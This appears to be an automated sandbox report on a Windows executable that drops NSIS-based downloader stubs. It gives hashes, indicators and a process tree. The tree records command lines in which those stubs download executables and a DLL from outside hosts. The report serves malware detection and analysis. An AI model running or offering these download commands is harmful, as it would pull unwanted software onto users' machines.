16cf04012ef864db7a062809d5867271272ad9e83cf52c21086900dba16c1d46

Analysis

max time kernel
0s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
24/12/2023, 18:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0ae93374c32da7e06d42d3fe9f893783.exe
Size

492KB
MD5

0ae93374c32da7e06d42d3fe9f893783
SHA1

2090c06d1099b19fcabbd1edaab49e1b4da40e97
SHA256

16cf04012ef864db7a062809d5867271272ad9e83cf52c21086900dba16c1d46
SHA512

2b12f959aa4b05b978a5c02370fc5ec2c7e63027f50dc364249583232210c5724f98cca7e921810d00394f4fc1ca051f713a61c6862abf4106456d986d722ea1
SSDEEP

6144:quk4fqj2cQqF6jtY03ZgLpp6TURimpBwXVUTL7E97IkXQxBRUoz0JehYvH7Aw0v9:Q4fwJ6peEUBwXVwM9vylzdYvH7AwC

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 6 IoCs

pid	Process
3844	downloaderSTUB.exe
1968	downloaderSTUB.exe
3692	downloaderSTUB.exe
3128	downloaderDDLR.exe
3120	downloaderOFFER0.exe
3040	preinstaller.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 14 IoCs

installer

resource	yara_rule
behavioral2/files/0x001000000002315e-16.dat	nsis_installer_1
behavioral2/files/0x001000000002315e-16.dat	nsis_installer_2
behavioral2/files/0x0009000000023201-11.dat	nsis_installer_1
behavioral2/files/0x0009000000023201-11.dat	nsis_installer_2
behavioral2/files/0x0009000000023201-10.dat	nsis_installer_1
behavioral2/files/0x0009000000023201-10.dat	nsis_installer_2
behavioral2/files/0x001000000002315e-15.dat	nsis_installer_1
behavioral2/files/0x001000000002315e-15.dat	nsis_installer_2
behavioral2/files/0x0009000000023201-13.dat	nsis_installer_1
behavioral2/files/0x0009000000023201-13.dat	nsis_installer_2
behavioral2/files/0x0009000000023201-7.dat	nsis_installer_1
behavioral2/files/0x0009000000023201-7.dat	nsis_installer_2
behavioral2/files/0x000700000002320b-4.dat	nsis_installer_1
behavioral2/files/0x000700000002320b-4.dat	nsis_installer_2

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2640 wrote to memory of 3844	2640	0ae93374c32da7e06d42d3fe9f893783.exe	25
PID 2640 wrote to memory of 3844	2640	0ae93374c32da7e06d42d3fe9f893783.exe	25
PID 2640 wrote to memory of 3844	2640	0ae93374c32da7e06d42d3fe9f893783.exe	25
PID 2640 wrote to memory of 1968	2640	0ae93374c32da7e06d42d3fe9f893783.exe	24
PID 2640 wrote to memory of 1968	2640	0ae93374c32da7e06d42d3fe9f893783.exe	24
PID 2640 wrote to memory of 1968	2640	0ae93374c32da7e06d42d3fe9f893783.exe	24
PID 2640 wrote to memory of 3692	2640	0ae93374c32da7e06d42d3fe9f893783.exe	23
PID 2640 wrote to memory of 3692	2640	0ae93374c32da7e06d42d3fe9f893783.exe	23
PID 2640 wrote to memory of 3692	2640	0ae93374c32da7e06d42d3fe9f893783.exe	23
PID 2640 wrote to memory of 3128	2640	0ae93374c32da7e06d42d3fe9f893783.exe	22
PID 2640 wrote to memory of 3128	2640	0ae93374c32da7e06d42d3fe9f893783.exe	22
PID 2640 wrote to memory of 3128	2640	0ae93374c32da7e06d42d3fe9f893783.exe	22
PID 2640 wrote to memory of 3120	2640	0ae93374c32da7e06d42d3fe9f893783.exe	18
PID 2640 wrote to memory of 3120	2640	0ae93374c32da7e06d42d3fe9f893783.exe	18
PID 2640 wrote to memory of 3120	2640	0ae93374c32da7e06d42d3fe9f893783.exe	18
PID 2640 wrote to memory of 3040	2640	0ae93374c32da7e06d42d3fe9f893783.exe	21
PID 2640 wrote to memory of 3040	2640	0ae93374c32da7e06d42d3fe9f893783.exe	21
PID 2640 wrote to memory of 3040	2640	0ae93374c32da7e06d42d3fe9f893783.exe	21

C:\Users\Admin\AppData\Local\Temp\0ae93374c32da7e06d42d3fe9f893783.exe
"C:\Users\Admin\AppData\Local\Temp\0ae93374c32da7e06d42d3fe9f893783.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2640
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderOFFER0.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderOFFER0.exe /U "http://www.directdownloader.com/toolbars/optimizer.exe" /D "C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\optimizer.exe"
  2⤵
  - Executes dropped EXE
  PID:3120
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\preinstaller.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\preinstaller.exe 0 "EX.2009.iTALIAN.LD.TS.XviD-MoON[volpebianca]" "Download"
  2⤵
  - Executes dropped EXE
  PID:3040
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderDDLR.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderDDLR.exe /U "http://www.directdownloader.com/DirectDownloaderInstaller.exe" /D "C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\DirectDownloaderInstaller.exe"
  2⤵
  - Executes dropped EXE
  PID:3128
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/updater.exe" /D "C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\updater.exe"
  2⤵
  - Executes dropped EXE
  PID:3692
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe /U "http://openbitcoin.org/static/dist/OpenCL.dll" /D "C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\OpenCL.dll"
  2⤵
  - Executes dropped EXE
  PID:1968
- C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe
  C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe /U "http://www.openbitcoin.org/static/dist/obc.exe" /D "C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\stub.exe"
  2⤵
  - Executes dropped EXE
  PID:3844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderDDLR.exe

Filesize
12KB

MD5
896e58f5d0adcf2156fe05c9015f8dd7

SHA1
1e16bd03c949cd21987136c73843a9dd0c7d29d6

SHA256
98f1b5d370529bc28535a36a4d8b4e4427dc2366de2a7a2c3d95f3283a6fdfa5

SHA512
067a3a7c00612df3c5a00aeef485444117a8b93c7ef6cd37b0feb44f46a899a87566d313e88abfe48bed5c9b8b9ed22cf8d45e8fdf618e9089ae7c4b33feb599

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderDDLR.exe

Filesize
6KB

MD5
b2bb48a41bd8435bcce325c90f7094e5

SHA1
d24e8e38b9c28c676e169ce2f80ac1101ba051da

SHA256
4699a00d9197ffb161a047aa329c8547614ce7a0c192c1b26cf98b137af23a64

SHA512
476927b1b8b6b773fd9205b94e9fe5c5157907ae0019f8fa83ae37d58cad730730de3737d99686615f02a514c890db0b706bdde6911ef24b7a52903c959daecc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderOFFER2.exe

Filesize
58KB

MD5
c7f6ed56312c8fbb58ae6ed445c38df4

SHA1
e2dba94ef052db774478b9f7198c1a2298b334e5

SHA256
fdb8452173a4f116f6e362ab5466c3c16bf6697502fe3d01db0d82f0e339de24

SHA512
ac43e5bb31c3c0876a7768553916cce76d92088e62594e8463b128a0d6e587c48152a5efcf0b2a5e8fb43028d46913df114ae3c3750b7e6c4212c7044518ba43

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe

Filesize
6KB

MD5
b3ab890b533188a20128269d31e4c4b7

SHA1
78fd85f8ea1aaa1d85bfab2ed48770db472d4273

SHA256
837b237166b975e92b85c541b2a9735d6ea40b4a716d2a6c302250bf4379cb6e

SHA512
7533fbbcee5a6fe08be3e35e9aff825717d9a9115e776d54ec2eeb02e50b7fe080695355674c42221d8aafff27547a3cc97aa892d210d04e9939b25885c2181c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe

Filesize
15KB

MD5
5a7f900bb393a1c2ef34335e69885860

SHA1
7cdb2c5876b5ba60bbecc9808bb617e1f8095c6c

SHA256
c5c0d1b5294ab858aba63cf2f50fd44002d5a0ebe02eb6613923f75a0f8a08b3

SHA512
ddbd3b176977b023e12f4301a16a181fc2d359f94f0347227946e89147ef89a8134d969c61d224b475ca8e907d3948418b9ea6192def8b05eb2ddfebd36b52ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe

Filesize
44KB

MD5
44f091b35a90d228759745a645a9d2f4

SHA1
38db216b9e76e105a12aab4c8478244e369a7f0a

SHA256
43d15bdecd0c369d50b1d8f08d41b228ab391e147b8881d54689005021ba2094

SHA512
d0b1570fcd40c242c26aa729caf59a8534f38de17de43851572cba4560a3311c9c7b6819f98843e0ec010b822d445e187a46ec66b43dfec09acda37d49f7d102

Download Submit
C:\Users\Admin\AppData\Local\Temp\7056c02cb2e6d9618fec25a1a289415e\downloaderSTUB.exe

Filesize
42KB

MD5
d30b9872b4829580d44e7d7df44bfe61

SHA1
d13312aeec5470dc215bcbec3dceba64dad80cb4

SHA256
56a4b8e775031e232b2dc5caf3ad7873a9e063dc0d8c86bbd149527f3fcc45b3

SHA512
b1c61c8c4825cdada6bc147c23f4c7426c1bc7adae596e0758673d93aee57797c0e630fdee864db17b3e111b7663dc90e1252e1bc65f1f20872c471b96dcd357

Download Submit
C:\Users\Admin\AppData\Local\Temp\nse5247.tmp\NSISdl.dll

Filesize
7KB

MD5
bf859e45732e18cb727d3f80af2da7ce

SHA1
9dd35b4dd140b8d2341a889c2b51ab7e50c58bd2

SHA256
9f407d13d3717df1632b44c95627879c7e0daec657f2e80a18bf29c25354718e

SHA512
c9b2d7cad14d0d8514abce94228a5271712a096ff2704163a95034ab0af44f64247b1dc0f7557c422e7755842bcb5822f59232d6c6ab24588995047c92048f99

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsk5267.tmp\NSISdl.dll

Filesize
6KB

MD5
d5e0e850235e64b01ebd2cc030536982

SHA1
2f6899280b71d795deae2490a341f6b1d006b6ff

SHA256
56b6858f7bebec07279029700f38da62119aa13f335739fb7e6496af789f8524

SHA512
6db23d9bd88c57bec7d8595730d8a9aad55b62a84cc0b56322e0fbb29d15f4874f4ee20f105d0fec7de65eb60432d219ac0e1643304a36c6ab17528f3e308411

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsu5257.tmp\NSISdl.dll

Filesize
6KB

MD5
a358972c7b90f22c4d6ff34aef940f1f

SHA1
85b61c7fdfd359c845104460359143596dbc8725

SHA256
3fd22d8625fe9c2ad9b33ca9dc1b0d8b2daed49bb987834944a5619ab7716efb

SHA512
c054d6ce3e537d0cb7364731c03053f1142ffdf7437940d68b67a2718e36c7a04bcc6d4dc1e512ce61c5521f918d0d2537417037b6681b62447dc87e486154f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsu5257.tmp\NSISdl.dll

Filesize
14KB

MD5
eea728d86e48f7ee68ee50cd8a2622a0

SHA1
9e4bed4140dd1496dde86491d86a9f9d02a22027

SHA256
1bac7abe52c554416abfbb37425e9c0e759f6ac8b051fdc3e5a34c92d3e2c885

SHA512
5a8c900f18f24286e1b9b0a28c828a751d4ebb324637fa0f9636bf91d802f39d05428f1a8a68f1c328e8825d95a4c822e5b7a87d6fefef6823eb79bbb45f1dbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsu5258.tmp\NSISdl.dll

Filesize
14KB

MD5
a5f8399a743ab7f9c88c645c35b1ebb5

SHA1
168f3c158913b0367bf79fa413357fbe97018191

SHA256
dacc88a12d3ba438fdae3535dc7a5a1d389bce13adc993706424874a782e51c9

SHA512
824e567f5211bf09c7912537c7836d761b0934207612808e9a191f980375c6a97383dbc6b4a7121c6b5f508cbfd7542a781d6b6b196ca24841f73892eec5e977

Download Submit
memory/2640-45-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/3040-46-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download